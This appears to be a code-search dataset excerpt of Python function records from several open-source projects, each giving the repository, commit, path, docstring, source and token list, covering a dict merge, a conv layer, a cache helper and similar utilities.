https://github.com/lxc/pylxd/blob/d82e4bbf81cb2a932d62179e895c955c489066fd/pylxd/models/instance.py#L335-L341
IronLanguages/ironpython3
7a7bb2a872eeab0d1009fc8a6e24dca43f65b693
Src/StdLib/Lib/lib2to3/pgen2/token.py
python
ISEOF
(x)
return x == ENDMARKER
[]
def ISEOF(x): return x == ENDMARKER
[ "def", "ISEOF", "(", "x", ")", ":", "return", "x", "==", "ENDMARKER" ]
https://github.com/IronLanguages/ironpython3/blob/7a7bb2a872eeab0d1009fc8a6e24dca43f65b693/Src/StdLib/Lib/lib2to3/pgen2/token.py#L82-L83
tobyyouup/conv_seq2seq
78a6e4e62a4c57a5caa9d584033a85e810fd726e
seq2seq/configurable.py
python
_deep_merge_dict
(dict_x, dict_y, path=None)
return dict_x
Recursively merges dict_y into dict_x.
Recursively merges dict_y into dict_x.
[ "Recursively", "merges", "dict_y", "into", "dict_x", "." ]
def _deep_merge_dict(dict_x, dict_y, path=None): """Recursively merges dict_y into dict_x. """ if path is None: path = [] for key in dict_y: if key in dict_x: if isinstance(dict_x[key], dict) and isinstance(dict_y[key], dict): _deep_merge_dict(dict_x[key], dict_y[key], path + [str(key)]) elif dict_x[key] == dict_y[key]: pass # same leaf value else: dict_x[key] = dict_y[key] else: dict_x[key] = dict_y[key] return dict_x
[ "def", "_deep_merge_dict", "(", "dict_x", ",", "dict_y", ",", "path", "=", "None", ")", ":", "if", "path", "is", "None", ":", "path", "=", "[", "]", "for", "key", "in", "dict_y", ":", "if", "key", "in", "dict_x", ":", "if", "isinstance", "(", "dict...
https://github.com/tobyyouup/conv_seq2seq/blob/78a6e4e62a4c57a5caa9d584033a85e810fd726e/seq2seq/configurable.py#L69-L83
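The `_deep_merge_dict` helper recorded above is pure Python and needs no framework context; a usage sketch on hypothetical config dicts shows the in-place, y-wins-on-conflict semantics:

```python
def deep_merge_dict(dict_x, dict_y, path=None):
    """Recursively merge dict_y into dict_x in place, as in the record above."""
    if path is None:
        path = []
    for key in dict_y:
        if key in dict_x:
            if isinstance(dict_x[key], dict) and isinstance(dict_y[key], dict):
                deep_merge_dict(dict_x[key], dict_y[key], path + [str(key)])
            elif dict_x[key] == dict_y[key]:
                pass  # same leaf value, nothing to do
            else:
                dict_x[key] = dict_y[key]  # conflicting leaf: y wins
        else:
            dict_x[key] = dict_y[key]  # key only in y: copy over
    return dict_x

x = {"model": {"cell": "lstm", "units": 128}}
y = {"model": {"units": 256}, "optimizer": "adam"}
print(deep_merge_dict(x, y))
# {'model': {'cell': 'lstm', 'units': 256}, 'optimizer': 'adam'}
```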
uqfoundation/klepto
a2b941fa2053ccbad731180d015bd39d3ee18c27
klepto/_archives.py
python
dir_archive._hasinput
(self, root)
return bool(walk(root,patterns=self._args,recurse=False,folders=False,files=True,links=False))
check if results subdirectory has stored input file
check if results subdirectory has stored input file
[ "check", "if", "results", "subdirectory", "has", "stored", "input", "file" ]
def _hasinput(self, root): "check if results subdirectory has stored input file" return bool(walk(root,patterns=self._args,recurse=False,folders=False,files=True,links=False))
[ "def", "_hasinput", "(", "self", ",", "root", ")", ":", "return", "bool", "(", "walk", "(", "root", ",", "patterns", "=", "self", ".", "_args", ",", "recurse", "=", "False", ",", "folders", "=", "False", ",", "files", "=", "True", ",", "links", "="...
https://github.com/uqfoundation/klepto/blob/a2b941fa2053ccbad731180d015bd39d3ee18c27/klepto/_archives.py#L542-L544
mxdg/passbytcp
0230198598b6df0098ac1630c10c1d377cdbf3f9
slaver/common_func.py
python
CtrlPkg._prebuilt_pkg
(cls, pkg_type, fallback)
return cls._cache_prebuilt_pkg[pkg_type]
act as lru_cache
act as lru_cache
[ "act", "as", "lru_cache" ]
def _prebuilt_pkg(cls, pkg_type, fallback): """act as lru_cache""" if pkg_type not in cls._cache_prebuilt_pkg: pkg = fallback(force_rebuilt=True) cls._cache_prebuilt_pkg[pkg_type] = pkg return cls._cache_prebuilt_pkg[pkg_type]
[ "def", "_prebuilt_pkg", "(", "cls", ",", "pkg_type", ",", "fallback", ")", ":", "if", "pkg_type", "not", "in", "cls", ".", "_cache_prebuilt_pkg", ":", "pkg", "=", "fallback", "(", "force_rebuilt", "=", "True", ")", "cls", ".", "_cache_prebuilt_pkg", "[", "...
https://github.com/mxdg/passbytcp/blob/0230198598b6df0098ac1630c10c1d377cdbf3f9/slaver/common_func.py#L388-L394
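`CtrlPkg._prebuilt_pkg` above is a hand-rolled build-once cache keyed by package type ("act as lru_cache"). The core pattern, sketched outside the class (the key name and payload below are made up for illustration):

```python
def cached_by_key(cache, key, build):
    """Build-once lookup: compute via build() on first request, then reuse."""
    if key not in cache:
        cache[key] = build()  # expensive construction happens at most once
    return cache[key]

calls = []
def build_pkg():
    calls.append(1)  # track how many times the builder actually runs
    return b"\x01\x02ctrl-pkg"

cache = {}
first = cached_by_key(cache, "PTYPE_HEART_BEAT", build_pkg)
second = cached_by_key(cache, "PTYPE_HEART_BEAT", build_pkg)
# both lookups return the same cached object; build_pkg ran exactly once
```

The original achieves the same effect by passing the real constructor as `fallback` with `force_rebuilt=True` on the first call.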
auroua/InsightFace_TF
6ffe4296460bdfea56f91521db6d6412a89249d9
nets/resnet.py
python
conv2d_same
(inputs, num_outputs, kernel_size, strides, rate=1, scope=None)
Reference slim resnet :param inputs: :param num_outputs: :param kernel_size: :param strides: :param rate: :param scope: :return:
Reference slim resnet :param inputs: :param num_outputs: :param kernel_size: :param strides: :param rate: :param scope: :return:
[ "Reference", "slim", "resnet", ":", "param", "inputs", ":", ":", "param", "num_outputs", ":", ":", "param", "kernel_size", ":", ":", "param", "strides", ":", ":", "param", "rate", ":", ":", "param", "scope", ":", ":", "return", ":" ]
def conv2d_same(inputs, num_outputs, kernel_size, strides, rate=1, scope=None): ''' Reference slim resnet :param inputs: :param num_outputs: :param kernel_size: :param strides: :param rate: :param scope: :return: ''' if strides == 1: if rate == 1: nets = tl.layers.Conv2d(inputs, n_filter=num_outputs, filter_size=(kernel_size, kernel_size), b_init=None, strides=(strides, strides), act=None, padding='SAME', name=scope) nets = tl.layers.BatchNormLayer(nets, act=tf.nn.relu, is_train=True, name=scope+'_bn/BatchNorm') else: nets = tl.layers.AtrousConv2dLayer(inputs, n_filter=num_outputs, filter_size=(kernel_size, kernel_size), rate=rate, act=None, padding='SAME', name=scope) nets = tl.layers.BatchNormLayer(nets, act=tf.nn.relu, is_train=True, name=scope+'_bn/BatchNorm') return nets else: kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1) pad_total = kernel_size_effective - 1 pad_beg = pad_total // 2 pad_end = pad_total - pad_beg inputs = tl.layers.PadLayer(inputs, [[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]], name='padding_%s' % scope) if rate == 1: nets = tl.layers.Conv2d(inputs, n_filter=num_outputs, filter_size=(kernel_size, kernel_size), b_init=None, strides=(strides, strides), act=None, padding='VALID', name=scope) nets = tl.layers.BatchNormLayer(nets, act=tf.nn.relu, is_train=True, name=scope+'_bn/BatchNorm') else: nets = tl.layers.AtrousConv2dLayer(inputs, n_filter=num_outputs, filter_size=(kernel_size, kernel_size), b_init=None, rate=rate, act=None, padding='SAME', name=scope) nets = tl.layers.BatchNormLayer(nets, act=tf.nn.relu, is_train=True, name=scope+'_bn/BatchNorm') return nets
[ "def", "conv2d_same", "(", "inputs", ",", "num_outputs", ",", "kernel_size", ",", "strides", ",", "rate", "=", "1", ",", "scope", "=", "None", ")", ":", "if", "strides", "==", "1", ":", "if", "rate", "==", "1", ":", "nets", "=", "tl", ".", "layers"...
https://github.com/auroua/InsightFace_TF/blob/6ffe4296460bdfea56f91521db6d6412a89249d9/nets/resnet.py#L66-L101
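The strided branch of `conv2d_same` above pads the input explicitly so a `VALID` convolution reproduces `SAME` output geometry, widening the effective kernel when dilation (`rate`) is used. The padding arithmetic in isolation, as a pure-Python sketch mirroring the lines in the record:

```python
def same_padding(kernel_size, rate=1):
    """Explicit (begin, end) pad amounts for 'SAME'-style striding.

    A dilated (atrous) kernel spans
    kernel_size + (kernel_size - 1) * (rate - 1) input positions.
    """
    kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
    pad_total = kernel_size_effective - 1
    pad_beg = pad_total // 2          # smaller half goes in front
    pad_end = pad_total - pad_beg     # remainder goes at the back
    return pad_beg, pad_end

print(same_padding(3))     # a 3x3 kernel pads one pixel per side: (1, 1)
print(same_padding(3, 2))  # rate 2 widens the kernel to 5 taps: (2, 2)
```

Even kernels pad asymmetrically (e.g. a 4-tap kernel gives `(1, 2)`), which is why the original pads manually instead of relying on `padding='SAME'` with strides.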
jcberquist/sublimetext-cfml
d1e37202eacbf4dd048f2822b7b9d9a93e8cebcf
src/component_index/component_index.py
python
build_dot_paths
(path_index, mappings, project_file_dir)
return dot_paths
[]
def build_dot_paths(path_index, mappings, project_file_dir): dot_paths = {} for file_path in path_index: for mapping in mappings: normalized_mapping = utils.normalize_mapping(mapping, project_file_dir) if file_path.startswith(normalized_mapping["path"]): mapped_path = normalized_mapping["mapping"] + file_path.replace(normalized_mapping["path"], "") path_parts = mapped_path.split("/")[1:] dot_path = ".".join(path_parts)[:-4] dot_paths[dot_path.lower()] = {"file_path": file_path, "dot_path": dot_path} return dot_paths
[ "def", "build_dot_paths", "(", "path_index", ",", "mappings", ",", "project_file_dir", ")", ":", "dot_paths", "=", "{", "}", "for", "file_path", "in", "path_index", ":", "for", "mapping", "in", "mappings", ":", "normalized_mapping", "=", "utils", ".", "normali...
https://github.com/jcberquist/sublimetext-cfml/blob/d1e37202eacbf4dd048f2822b7b9d9a93e8cebcf/src/component_index/component_index.py#L12-L22
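`build_dot_paths` above rewrites `.cfc` file paths through project mappings into lowercase dot-path keys. A simplified, self-contained sketch that assumes mappings are already normalized to `{"path": ..., "mapping": ...}` dicts (the real code delegates that to `utils.normalize_mapping`); the example paths are invented:

```python
def build_dot_paths(path_index, normalized_mappings):
    """Map .cfc file paths to lowercase dot paths via project mappings."""
    dot_paths = {}
    for file_path in path_index:
        for m in normalized_mappings:
            if file_path.startswith(m["path"]):
                # swap the on-disk prefix for the mapping prefix
                mapped = m["mapping"] + file_path[len(m["path"]):]
                # drop the empty leading segment, join with dots, strip ".cfc"
                dot_path = ".".join(mapped.split("/")[1:])[:-4]
                dot_paths[dot_path.lower()] = {"file_path": file_path,
                                               "dot_path": dot_path}
    return dot_paths

result = build_dot_paths(["/proj/model/User.cfc"],
                         [{"path": "/proj", "mapping": "/app"}])
# keys are lowercased for case-insensitive lookup; the original casing
# is preserved in the "dot_path" value
```

As in the original, the mapping prefix (here `app`) becomes the leading segment of the dot path.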
yt-project/yt
dc7b24f9b266703db4c843e329c6c8644d47b824
yt/frontends/stream/data_structures.py
python
StreamOctreeHandler._setup_classes
(self)
[]
def _setup_classes(self): dd = self._get_data_reader_dict() super()._setup_classes(dd)
[ "def", "_setup_classes", "(", "self", ")", ":", "dd", "=", "self", ".", "_get_data_reader_dict", "(", ")", "super", "(", ")", ".", "_setup_classes", "(", "dd", ")" ]
https://github.com/yt-project/yt/blob/dc7b24f9b266703db4c843e329c6c8644d47b824/yt/frontends/stream/data_structures.py#L809-L811
khanhnamle1994/natural-language-processing
01d450d5ac002b0156ef4cf93a07cb508c1bcdc5
assignment1/.env/lib/python2.7/site-packages/pip/_vendor/cachecontrol/heuristics.py
python
BaseHeuristic.warning
(self, response)
return '110 - "Response is Stale"'
Return a valid 1xx warning header value describing the cache adjustments. The response is provided to allow warnings like 113 http://tools.ietf.org/html/rfc7234#section-5.5.4 where we need to explicitly say response is over 24 hours old.
Return a valid 1xx warning header value describing the cache adjustments.
[ "Return", "a", "valid", "1xx", "warning", "header", "value", "describing", "the", "cache", "adjustments", "." ]
def warning(self, response): """ Return a valid 1xx warning header value describing the cache adjustments. The response is provided to allow warnings like 113 http://tools.ietf.org/html/rfc7234#section-5.5.4 where we need to explicitly say response is over 24 hours old. """ return '110 - "Response is Stale"'
[ "def", "warning", "(", "self", ",", "response", ")", ":", "return", "'110 - \"Response is Stale\"'" ]
https://github.com/khanhnamle1994/natural-language-processing/blob/01d450d5ac002b0156ef4cf93a07cb508c1bcdc5/assignment1/.env/lib/python2.7/site-packages/pip/_vendor/cachecontrol/heuristics.py#L22-L31